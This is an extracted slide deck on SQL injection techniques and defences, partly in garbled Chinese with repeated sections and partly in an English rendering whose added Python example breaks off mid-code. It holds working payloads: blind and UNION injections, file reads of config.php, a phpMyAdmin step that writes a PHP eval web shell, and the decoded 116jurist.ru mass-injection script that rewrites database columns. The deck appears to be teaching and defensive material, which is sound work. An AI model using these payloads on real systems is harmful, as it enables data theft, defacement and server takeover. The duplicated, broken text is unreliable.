CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
Time-Based Blind SQL Injection - using heavy queries (2/2)
Time-Based Blind SQL Injection - guessing the database name through time delays
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(1),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
• …
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
SQL Injection Attack Techniques - Bypassing Escape Characters
• ASCII encoding
  – ASCII(), CHAR()
  – a single character
    • CHAR(68)
  – several characters
    • CHAR(68,58,92)
• Hexadecimal encoding
  – HEX()
  – 0x443A5C
• Double-byte escape technique
SQL Injection Attack Techniques - Guessing Data (bypassing escaping)
• Guessing fields
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+user--
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+member--
• Guessing field data
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(0)
  – …
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(119)
SQL Injection Attack Techniques - Reading Data (bypassing escaping)
• Reading data / writing files (the file name is passed without quotes, as a CHAR() list or a hex literal)
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98,115,105,116,101,92,119,119,119,46,104,97,99,107,100,101,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46,112,104,112))--
    (the CHAR() list decodes to D:\Website\www.hackdemo.com\getUser.php)
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974655C7777772E6861636B64656D6F2E636F6D5C636F6E6669672E706870)--
    (the hex literal decodes to D:\Website\www.hackdemo.com\config.php)
SQL Injection Attack Techniques - Writing a File (when the quote restriction cannot be bypassed)
1. Find phpMyAdmin
2. Remote MySQL
mysql> use xssdb;
mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
mysql> prepare cmd from @a;
mysql> execute cmd;
@a is:
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'
The file written is:
<?php @eval($_POST['cmd']);?>
SQL Injection Attack Techniques - Double-byte escape technique (1/3)
• The injected byte and the backslash (0x5c) added by escaping recombine into one character, bypassing the escape-character restriction
• Scenario
  – escape characters handled by
    • addslashes
    • mysql_escape_string
    • php.ini
  – magic_quotes_gpc enabled
  – BIG5 or GBK encoding in use
    • set names gbk / set names big5
SQL Injection Attack Techniques - Double-byte escape technique (2/3)
• Chinese-language text is represented with two bytes per character
  – Big5
    • lead byte 0x81-0xFE, trail byte 0x40-0x7E or 0xA1-0xFE
  – GBK
    • lead byte 0x81-0xFE, trail byte 0x40-0x7E
  – GB2312
    • lead byte 0xB0-0xF7, trail byte 0xA0-0xFE
  – lead bytes used in the attack: BF, CC, D5, …
SQL Injection Attack Techniques - Double-byte escape technique (3/3)
• Bypassing escaping in a quoted parameter
  – http://www.hackdemo.com/searchUserLash.php?name=h%B5'+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%CC'+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%d5'+AND+1=2+UNION+SELECT+1,2,3,4%23
SQL Column Truncation - Overview (1/3)
• sql_mode in MySQL
  – STRICT_ALL_TABLES not enabled
    • inserting data longer than the column produces a warning
    • but the data is still inserted (truncated to the column width)
  – STRICT_ALL_TABLES enabled
    • inserting data longer than the column produces an error message
    • ERROR 1406 is raised and the row is not inserted
• Incident
  – 2008-09-07
    • WordPress 2.6.1 SQL Column Truncation Vulnerability
SQL Column Truncation - Effect (2/3)
SQL Column Truncation - Defences (3/3)
• Proactively strip whitespace from strings that should not contain any
  – e.g. account names
• Add the BINARY keyword when SELECTing the data
• Configure MySQL to compare with BINARY by default
• Enable STRICT_ALL_TABLES in MySQL
  – over-length data raises an ERROR instead of a WARNING
  – to avoid errors on insert, additional checks may be needed on insert and update
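The truncation effect and the defences listed above, as an added example that is not part of the deck: a small Python model of a VARCHAR(60) login column under a non-strict sql_mode, of the trailing-space-insensitive comparison of non-BINARY columns, and of the whitespace/length validation and strict mode that close the hole. The column width, the account name and all function names are constructed assumptions; the code imitates MySQL's behaviour rather than talking to a server.

```python
"""Model of SQL Column Truncation and its mitigations (constructed example).
It imitates MySQL behaviour in plain Python; nothing here talks to a database."""
from typing import List, Tuple

COLUMN_LEN = 60   # assumed VARCHAR(60) login column (constructed)


def nonstrict_insert(value: str, maxlen: int = COLUMN_LEN) -> Tuple[str, List[str]]:
    """INSERT without STRICT_ALL_TABLES: over-length data is silently cut to the
    column width and only a warning is recorded; the row is stored anyway."""
    warnings: List[str] = []
    if len(value) > maxlen:
        warnings.append(f"Data truncated for column (len {len(value)} > {maxlen})")
        value = value[:maxlen]
    return value, warnings


def strict_insert(value: str, maxlen: int = COLUMN_LEN) -> str:
    """INSERT with STRICT_ALL_TABLES: over-length data is an error, no row is stored."""
    if len(value) > maxlen:
        raise ValueError("ERROR 1406: Data too long for column")
    return value


def padspace_equal(a: str, b: str) -> bool:
    """Comparison of non-BINARY CHAR/VARCHAR values: trailing spaces are ignored."""
    return a.rstrip(" ") == b.rstrip(" ")


def binary_equal(a: str, b: str) -> bool:
    """Comparison with the BINARY keyword: every byte counts."""
    return a == b


def validate_account_name(value: str, maxlen: int = COLUMN_LEN) -> str:
    """Application-side check from the defence slide: no whitespace in an
    account name, and never longer than the column."""
    if any(ch.isspace() for ch in value):
        raise ValueError("account name must not contain whitespace")
    if len(value) > maxlen:
        raise ValueError(f"account name longer than {maxlen} characters")
    return value


def collision_demo(existing: str = "admin", maxlen: int = COLUMN_LEN) -> dict:
    """Register a name that differs from `existing` only beyond the column
    width and report how each layer reacts."""
    crafted = existing + " " * (maxlen - len(existing)) + "x"   # len == maxlen + 1
    stored, warnings = nonstrict_insert(crafted, maxlen)
    result = {
        # the uniqueness check at registration compares the full crafted string
        "precheck_found_existing": padspace_equal(crafted, existing),
        "stored": stored,
        "truncation_warnings": len(warnings),
        # a later lookup WHERE login = 'admin' against the truncated row
        "padspace_match": padspace_equal(stored, existing),   # non-BINARY: collides
        "binary_match": binary_equal(stored, existing),       # BINARY: does not
    }
    try:
        strict_insert(crafted, maxlen)
        result["strict_mode_rejects"] = False
    except ValueError:
        result["strict_mode_rejects"] = True
    try:
        validate_account_name(crafted, maxlen)
        result["validation_rejects"] = False
    except ValueError:
        result["validation_rejects"] = True
    return result


if __name__ == "__main__":
    for key, val in collision_demo().items():
        print(f"{key}: {val!r}")
```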
SQL Injection - Further Thoughts
• Can attacks also happen through INSERT and UPDATE?
• Does NoSQL really have no SQL Injection?
• Other exploitation techniques
  – Deep Blind Injection
  – Error-Based Injection
    • Duplicate Error
    • Function
  – information_schema
  – User-Defined Functions
  – Triggers
SQL Injection - Automated Tools
• Havij
• Pangolin
• w3af
• Jsky
• SQLmap
• …
Defending against SQL Injection properly
• Principle of least privilege
• Use prepared statements
• Use stored procedures
• Use UTF-8; avoid BIG5 and GBK
• Check data types and cast explicitly
  – bool settype(mixed &$var, string $type)
  – intval(), doubleval()
• Use safe library functions
  – OWASP ESAPI
    • MySQLCodec
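To connect the double-byte escape slides above with the "use UTF-8, avoid BIG5 and GBK" advice, here is an added example that is not from the deck or its author: it models PHP-style byte-wise addslashes() escaping, shows why a lone GBK/Big5 lead byte such as 0xB5 absorbs the escaping backslash so that the quote survives, and shows a charset-aware escape (decode first, then escape) that rejects the malformed input instead. The payload bytes, the charset list and all function names are constructed for illustration.

```python
"""Model of the double-byte escape problem: byte-wise escaping (addslashes /
magic_quotes_gpc) versus charset-aware escaping. Constructed example."""

# Constructed input: the deck's name=h%B5' parameter after URL decoding.
PAYLOAD = b"h\xb5'"

# Bytes that PHP's addslashes() prefixes with a backslash.
ESCAPED_BYTES = {ord("'"), ord('"'), ord("\\"), 0}


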